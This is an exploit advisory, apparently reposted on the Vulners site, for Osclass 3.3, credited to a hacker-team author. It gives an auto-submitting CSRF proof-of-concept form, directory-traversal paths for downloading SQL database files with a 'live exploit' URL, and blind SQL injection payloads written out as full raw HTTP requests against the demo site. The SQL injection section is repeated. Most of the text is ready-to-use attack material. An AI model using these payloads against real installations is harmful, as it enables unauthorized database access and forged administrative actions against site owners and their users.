Vulners
Lucene search
Osclass 3.3 Cross Site Request Forgery / SQL Injection / Traversal
`=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Vendor: http://osclass.org
[+] Software:Osclass
[+] Version : 3.3
[~]
[~] author: R3d-D3v!L
[+] TEAM: ABH
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 14.d3c.2ol3
[?] T!ME: 04:54 am GMT
[?] Home: soon
[^]
[?]
===============================================================================
#Osclass v3.3 suffering from CSRF Vulnerability
===============================================================================
[!] Exploit Already Tested ... on apache
[^] Error console:- /general/index.php
[?] proof of concept :
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="<empty>" action="http://demo.osclass.org/general/index.php" method=GET enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=page value="">
<input type=hidden size=30 maxlength=30 name=sOrder value="">
<input type=hidden size=30 maxlength=30 name=iOrderType value="">
<td><input type=text size=30 maxlength=250 name=sPattern value=""></td>
<td><input type=text size=30 maxlength=100 name=sCity value=""></td>
<td><input type=text size=30 maxlength=100 name=sRegion value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td>
<td><input type=text size=30 maxlength=250 name=sPriceMin value=""></td>
<td><input type=text size=30 maxlength=100 name=sPriceMax value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=sCategory value=""></td>
<input type=submit class=button value='Save'>
</form>
</html>
===============================================================================
#Osclass v3.3 suffering from directory traversal Vulnerability
===============================================================================
[!] Exploit Already Tested ... on apache
[^] Error console:- directory traversal allow to dump db
[?] proof of concept :
/general/oc-content/languages/en_US/mail.sql
/general/oc-includes/osclass/installer/basic_data.sql
/general/oc-includes/osclass/installer/pages.sql
[?]live exploit
http://demo.osclass.org/general/oc-content/languages/en_US/mail.sql
===============================================================================
#Osclass v3.3 suffering from Blind sql injection Vulnerability
===============================================================================
[!] Exploit Already Tested ... on apache
[^] Error console:-
1*-URL encoded GET input action was set to -1' or 18 = '16
2*-URL encoded POST input action was set to -1" or 34 = "31
[?] proof of concept :
1* - /general/oc-admin/index.php
2* - /general/index.php1*-
RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
2*-
POST /general/index.php HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst
[~]-----------------------------{(ƦȜd-DΣV!L)}------------------------------------------------
#
[~] Greetz tO: virus_jordan & & H@CK3R M!ND & Syrianoo ĦąĈkỉŋg & ĦǒĿǻkő ẾŁếstorầ & Netikerty Asenet ...etc ;
#
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;
#
[~] special thanks :all soqor members & xp10 # ;
#
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ;
#
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #;
#
[~]spechial FR!ND: they all are spechials ;) #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------
=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: suffering from CSRF Vulnerability
[~] Vendor: http://osclass.org
[+] Software:Osclass
[+] Version : 3.3
[~]
[~] author: R3d-D3v!L
[+] TEAM: ABH
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 14.d3c.2ol3
[?] T!ME: 04:54 am GMT
[?] Home: soon
[^]
[?]
===============================================================================
#Osclass v3.3 suffering from Blind sql injection Vulnerability
===============================================================================
[!] Exploit Already Tested ... on apache
[^] Error console:-
1*-URL encoded GET input action was set to -1' or 18 = '16
2*-URL encoded POST input action was set to -1" or 34 = "31
[?] proof of concept :
1* - /general/oc-admin/index.php
2* - /general/index.php1*-
RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
2*-
POST /general/index.php HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst
[~]-----------------------------{(ƦȜd-DΣV!L)}------------------------------------------------
#
[~] Greetz tO: virus_jordan & & H@CK3R M!ND & Syrianoo ĦąĈkỉŋg & ĦǒĿǻkő ẾŁếstorầ & Netikerty Asenet ...etc ;
#
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;
#
[~] special thanks :all soqor members & xp10 # ;
#
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ;
#
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #;
#
[~]spechial FR!ND: they all are spechials ;) #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Dec 2013 00:00Current
0.1Low risk
Vulners AI Score0.1